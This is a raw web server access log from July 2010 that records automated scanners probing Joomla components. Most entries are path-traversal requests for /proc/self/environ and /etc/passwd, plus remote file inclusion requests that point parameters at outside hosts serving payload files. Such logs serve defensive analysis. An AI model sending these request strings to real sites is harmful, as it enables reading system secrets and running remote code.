210.127.209.52 - - [27/Jul/2010:10:48:57 +0200] "GET /become_editor.php?theme_path=http://www.joopjr.nl/em/ipays/Ckrid1.txt?? HTTP/1.1" 404 304 "-" "kmccrew Bot Search"
210.127.209.52 - - [27/Jul/2010:10:48:58 +0200] "GET /logs/become_editor.php?theme_path=http://www.joopjr.nl/em/ipays/Ckrid1.txt?? HTTP/1.1" 404 309 "-" "kmccrew Bot Search"
210.127.209.52 - - [27/Jul/2010:10:48:58 +0200] "GET /logs/access_log/become_editor.php?theme_path=http://www.joopjr.nl/em/ipays/Ckrid1.txt?? HTTP/1.1" 404 320 "-" "kmccrew Bot Search"
67.227.197.25 - - [27/Jul/2010:10:49:27 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.833"
67.227.197.25 - - [27/Jul/2010:10:49:27 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.833"
67.227.197.25 - - [27/Jul/2010:10:49:27 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.833"
67.227.197.25 - - [27/Jul/2010:10:49:27 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.833"
210.127.209.52 - - [27/Jul/2010:10:49:50 +0200] "GET /become_editor.php?theme_path=http://www.joopjr.nl/em/ipays/Ckrid1.txt?? HTTP/1.1" 404 304 "-" "kmccrew Bot Search"
210.127.209.52 - - [27/Jul/2010:10:49:50 +0200] "GET /logs/become_editor.php?theme_path=http://www.joopjr.nl/em/ipays/Ckrid1.txt?? HTTP/1.1" 404 309 "-" "kmccrew Bot Search"
210.127.209.52 - - [27/Jul/2010:10:49:51 +0200] "GET /logs/access_log/become_editor.php?theme_path=http://www.joopjr.nl/em/ipays/Ckrid1.txt?? HTTP/1.1" 404 320 "-" "kmccrew Bot Search"
83.149.110.213 - - [27/Jul/2010:10:51:05 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:10:51:05 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
92.43.201.28 - - [27/Jul/2010:10:51:11 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:10:51:11 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.813"
83.149.110.213 - - [27/Jul/2010:10:51:15 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:10:51:16 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:10:51:18 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:10:51:18 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
92.43.201.28 - - [27/Jul/2010:10:51:48 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:10:51:48 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.813"
210.127.209.52 - - [27/Jul/2010:10:52:50 +0200] "GET /logs/become_editor.php?theme_path=http://www.joopjr.nl/em/ipays/Ckrid1.txt?? HTTP/1.1" 404 309 "-" "kmccrew Bot Search"
210.127.209.52 - - [27/Jul/2010:10:52:50 +0200] "GET /become_editor.php?theme_path=http://www.joopjr.nl/em/ipays/Ckrid1.txt?? HTTP/1.1" 404 304 "-" "kmccrew Bot Search"
210.127.209.52 - - [27/Jul/2010:10:52:58 +0200] "GET /become_editor.php?theme_path=http://www.joopjr.nl/em/ipays/Ckrid1.txt?? HTTP/1.1" 404 304 "-" "kmccrew Bot Search"
210.127.209.52 - - [27/Jul/2010:10:52:58 +0200] "GET /logs/become_editor.php?theme_path=http://www.joopjr.nl/em/ipays/Ckrid1.txt?? HTTP/1.1" 404 309 "-" "kmccrew Bot Search"
210.127.209.52 - - [27/Jul/2010:10:53:22 +0200] "GET /logs/become_editor.php?theme_path=http://www.joopjr.nl/em/ipays/Ckrid1.txt?? HTTP/1.1" 404 309 "-" "kmccrew Bot Search"
210.127.209.52 - - [27/Jul/2010:10:53:22 +0200] "GET /become_editor.php?theme_path=http://www.joopjr.nl/em/ipays/Ckrid1.txt?? HTTP/1.1" 404 304 "-" "kmccrew Bot Search"
210.127.209.52 - - [27/Jul/2010:10:53:22 +0200] "GET /become_editor.php?theme_path=http://www.joopjr.nl/em/ipays/Ckrid1.txt?? HTTP/1.1" 404 304 "-" "kmccrew Bot Search"
210.127.209.52 - - [27/Jul/2010:10:53:23 +0200] "GET /logs/become_editor.php?theme_path=http://www.joopjr.nl/em/ipays/Ckrid1.txt?? HTTP/1.1" 404 309 "-" "kmccrew Bot Search"
210.127.209.52 - - [27/Jul/2010:10:53:39 +0200] "GET /logs/become_editor.php?theme_path=http://www.joopjr.nl/em/ipays/Ckrid1.txt?? HTTP/1.1" 404 309 "-" "kmccrew Bot Search"
210.127.209.52 - - [27/Jul/2010:10:53:39 +0200] "GET /become_editor.php?theme_path=http://www.joopjr.nl/em/ipays/Ckrid1.txt?? HTTP/1.1" 404 304 "-" "kmccrew Bot Search"
210.127.209.52 - - [27/Jul/2010:10:53:43 +0200] "GET /logs/become_editor.php?theme_path=http://www.joopjr.nl/em/ipays/Ckrid1.txt?? HTTP/1.1" 404 309 "-" "kmccrew Bot Search"
210.127.209.52 - - [27/Jul/2010:10:53:43 +0200] "GET /become_editor.php?theme_path=http://www.joopjr.nl/em/ipays/Ckrid1.txt?? HTTP/1.1" 404 304 "-" "kmccrew Bot Search"
210.127.209.52 - - [27/Jul/2010:10:54:09 +0200] "GET /logs/become_editor.php?theme_path=http://www.joopjr.nl/em/ipays/Ckrid1.txt?? HTTP/1.1" 404 309 "-" "kmccrew Bot Search"
210.127.209.52 - - [27/Jul/2010:10:54:10 +0200] "GET /become_editor.php?theme_path=http://www.joopjr.nl/em/ipays/Ckrid1.txt?? HTTP/1.1" 404 304 "-" "kmccrew Bot Search"
210.127.209.52 - - [27/Jul/2010:10:54:10 +0200] "GET /become_editor.php?theme_path=http://www.joopjr.nl/em/ipays/Ckrid1.txt?? HTTP/1.1" 404 304 "-" "kmccrew Bot Search"
210.127.209.52 - - [27/Jul/2010:10:54:12 +0200] "GET /logs/become_editor.php?theme_path=http://www.joopjr.nl/em/ipays/Ckrid1.txt?? HTTP/1.1" 404 309 "-" "kmccrew Bot Search"
203.147.62.92 - - [27/Jul/2010:10:57:08 +0200] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
203.147.62.92 - - [27/Jul/2010:10:57:11 +0200] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
94.23.215.207 - - [27/Jul/2010:10:57:17 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:10:57:17 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:10:57:21 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:10:57:21 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:10:57:26 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:10:57:27 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
87.118.67.13 - - [27/Jul/2010:10:59:01 +0200] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.813"
87.118.67.13 - - [27/Jul/2010:10:59:01 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.813"
202.47.80.12 - - [27/Jul/2010:11:07:42 +0200] "GET /logs/access_log//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:11:07:47 +0200] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:11:07:53 +0200] "GET /logs//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 305 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:11:08:04 +0200] "GET /logs/access_log//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:11:08:10 +0200] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:11:08:16 +0200] "GET /logs//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 305 "-" "libwww-perl/5.805"
203.147.62.92 - - [27/Jul/2010:11:14:21 +0200] "GET /logs/access_log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
203.147.62.92 - - [27/Jul/2010:11:14:22 +0200] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
203.147.62.92 - - [27/Jul/2010:11:14:22 +0200] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
203.147.62.92 - - [27/Jul/2010:11:17:12 +0200] "GET /logs/access_log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
203.147.62.92 - - [27/Jul/2010:11:17:13 +0200] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
203.147.62.92 - - [27/Jul/2010:11:17:13 +0200] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
94.23.215.207 - - [27/Jul/2010:11:22:41 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:11:22:41 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:11:22:41 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:11:22:41 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:11:22:41 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:11:22:41 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
69.16.231.183 - - [27/Jul/2010:11:26:35 +0200] "GET /index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.834"
94.23.215.207 - - [27/Jul/2010:11:28:35 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:11:28:35 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:11:28:37 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:11:28:37 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:11:28:37 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:11:28:37 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
91.121.141.186 - - [27/Jul/2010:11:39:55 +0200] "GET /logs/access_log/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
91.121.141.186 - - [27/Jul/2010:11:39:55 +0200] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
91.121.141.186 - - [27/Jul/2010:11:39:56 +0200] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
188.165.217.175 - - [27/Jul/2010:11:40:12 +0200] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
188.165.217.175 - - [27/Jul/2010:11:40:12 +0200] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
91.121.141.186 - - [27/Jul/2010:11:40:15 +0200] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
91.121.141.186 - - [27/Jul/2010:11:40:15 +0200] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
81.93.3.182 - - [27/Jul/2010:11:40:22 +0200] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
81.93.3.182 - - [27/Jul/2010:11:40:22 +0200] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
91.121.141.186 - - [27/Jul/2010:11:40:25 +0200] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
81.93.3.182 - - [27/Jul/2010:11:40:25 +0200] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
81.93.3.182 - - [27/Jul/2010:11:41:54 +0200] "GET /logs/access_log/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
81.93.3.182 - - [27/Jul/2010:11:41:54 +0200] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
81.93.3.182 - - [27/Jul/2010:11:41:54 +0200] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
220.181.7.90 - - [27/Jul/2010:11:51:04 +0200] "GET / HTTP/1.1" 200 560 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.66.79 - - [27/Jul/2010:11:51:57 +0200] "GET / HTTP/1.1" 200 560 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
98.130.2.13 - - [27/Jul/2010:12:00:26 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.808"
98.130.2.13 - - [27/Jul/2010:12:00:26 +0200] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
98.130.2.13 - - [27/Jul/2010:12:00:26 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.808"
67.218.116.163 - - [27/Jul/2010:12:04:50 +0200] "GET /robots.txt HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
195.186.81.78 - - [27/Jul/2010:12:17:30 +0200] "GET //index.php?option=com_linkr&controller=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
195.186.81.78 - - [27/Jul/2010:12:17:30 +0200] "GET /logs//index.php?option=com_linkr&controller=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
195.186.81.78 - - [27/Jul/2010:12:17:30 +0200] "GET /logs/access_log//index.php?option=com_linkr&controller=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 313 "-" "Mozilla/5.0"
67.195.112.43 - - [27/Jul/2010:12:26:18 +0200] "GET /robots.txt HTTP/1.0" 404 297 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.43 - - [27/Jul/2010:12:26:18 +0200] "GET /logs/ HTTP/1.0" 200 797 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
193.138.125.55 - - [27/Jul/2010:12:59:49 +0200] "GET /index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
193.138.125.55 - - [27/Jul/2010:13:10:56 +0200] "GET /logs/access_log/index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.808"
193.138.125.55 - - [27/Jul/2010:13:10:57 +0200] "GET /index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
193.138.125.55 - - [27/Jul/2010:13:10:57 +0200] "GET /logs/index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.808"
193.138.125.55 - - [27/Jul/2010:13:12:18 +0200] "GET //index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
193.138.125.55 - - [27/Jul/2010:13:12:19 +0200] "GET /index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
193.138.125.55 - - [27/Jul/2010:13:12:19 +0200] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
195.186.81.78 - - [27/Jul/2010:13:12:19 +0200] "GET /logs//index.php?option=com_mscomment&controller=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
195.186.81.78 - - [27/Jul/2010:13:12:19 +0200] "GET /logs/access_log//index.php?option=com_mscomment&controller=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 313 "-" "Mozilla/5.0"
195.186.81.78 - - [27/Jul/2010:13:12:19 +0200] "GET //index.php?option=com_mscomment&controller=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
174.121.240.147 - - [27/Jul/2010:13:25:52 +0200] "GET //index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.810"
121.78.118.123 - - [27/Jul/2010:13:26:14 +0200] "GET //index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
174.121.240.147 - - [27/Jul/2010:13:26:45 +0200] "GET //index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.810"
213.229.106.147 - - [27/Jul/2010:13:28:06 +0200] "GET //index.php?option=com_aardvertiser&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:13:28:23 +0200] "GET //index.php?option=com_aardvertiser&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
174.121.240.147 - - [27/Jul/2010:13:28:38 +0200] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
125.141.91.138 - - [27/Jul/2010:13:28:39 +0200] "GET //index.php?option=com_aardvertiser&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
67.159.44.97 - - [27/Jul/2010:13:29:09 +0200] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 354 "-" "Mozilla/5.0"
67.159.44.97 - - [27/Jul/2010:13:29:09 +0200] "GET /logs/access_log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 372 "-" "Mozilla/5.0"
67.159.44.97 - - [27/Jul/2010:13:29:09 +0200] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 359 "-" "Mozilla/5.0"
93.125.99.2 - - [27/Jul/2010:13:30:17 +0200] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 354 "-" "Mozilla/5.0"
93.125.99.2 - - [27/Jul/2010:13:30:17 +0200] "GET /logs/access_log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 372 "-" "Mozilla/5.0"
93.125.99.2 - - [27/Jul/2010:13:30:17 +0200] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 359 "-" "Mozilla/5.0"
213.229.106.147 - - [27/Jul/2010:13:30:36 +0200] "GET /logs/access_log//index.php?option=com_aardvertiser&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
213.229.106.147 - - [27/Jul/2010:13:30:36 +0200] "GET //index.php?option=com_aardvertiser&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
213.229.106.147 - - [27/Jul/2010:13:30:36 +0200] "GET /logs//index.php?option=com_aardvertiser&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
188.165.213.8 - - [27/Jul/2010:13:30:38 +0200] "GET /index.php?option=com_qcontacts&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
188.165.213.8 - - [27/Jul/2010:13:31:12 +0200] "GET /index.php?option=com_qcontacts&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
188.165.213.8 - - [27/Jul/2010:13:31:20 +0200] "GET /index.php?option=com_qcontacts&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
174.121.240.147 - - [27/Jul/2010:13:32:14 +0200] "GET //index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.810"
121.78.118.123 - - [27/Jul/2010:13:32:23 +0200] "GET /logs/access_log//index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
121.78.118.123 - - [27/Jul/2010:13:32:24 +0200] "GET //index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
121.78.118.123 - - [27/Jul/2010:13:32:24 +0200] "GET /logs//index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:13:33:26 +0200] "GET /logs/access_log//index.php?option=com_aardvertiser&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:13:33:26 +0200] "GET //index.php?option=com_aardvertiser&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:13:33:27 +0200] "GET /logs//index.php?option=com_aardvertiser&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
125.141.91.138 - - [27/Jul/2010:13:33:57 +0200] "GET /logs/access_log//index.php?option=com_aardvertiser&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
125.141.91.138 - - [27/Jul/2010:13:33:58 +0200] "GET //index.php?option=com_aardvertiser&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
125.141.91.138 - - [27/Jul/2010:13:33:58 +0200] "GET /logs//index.php?option=com_aardvertiser&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
174.121.240.147 - - [27/Jul/2010:13:35:34 +0200] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
121.78.118.123 - - [27/Jul/2010:13:36:15 +0200] "GET //index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
76.70.7.48 - - [27/Jul/2010:13:36:20 +0200] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
188.165.213.8 - - [27/Jul/2010:13:37:21 +0200] "GET /logs/access_log/index.php?option=com_qcontacts&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
188.165.213.8 - - [27/Jul/2010:13:37:21 +0200] "GET /index.php?option=com_qcontacts&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
